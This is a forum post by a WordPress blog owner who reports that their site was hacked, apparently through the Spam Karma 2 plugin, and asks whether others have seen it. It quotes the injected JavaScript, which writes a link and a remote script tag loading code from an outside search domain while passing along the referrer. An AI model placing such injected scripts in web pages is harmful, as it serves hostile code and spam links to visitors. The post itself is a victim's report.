Hacked via the Spam Karma 2 (SK2) plugin?

My 2.5.1 blog was hacked recently, adding links to 23search.com and other places. A malicious script was running in a div near the footer of the blog:

<script>
document.write("<H1><a href='https://www.23search.org/?q="+escape(document.referrer)+"'>Proceed to results</a></H1>");
document.write("\<script");
document.write(" src=\"https://www.23search.org/?j="+escape(document.referrer)+"\"\>");
document.write("\<\/script\>");
</script><h1><a href="https://www.23search.org/?q=http%3A//{my blog's URL}/">Proceed to results</a></h1><script src="https://www.23search.org/?j= ...

And so on.

When I tried to find how it had been done, I traced the hack to my plugins. To my surprise, disabling Spam Karma 2 foiled the hack.

Has anyone encountered this hack before? I’m not sure if it is SK2 itself or one of its plugins, but something is not right.

And yeah, I feel less secure without SK2, but how can I trust it anymore?

Thoughts?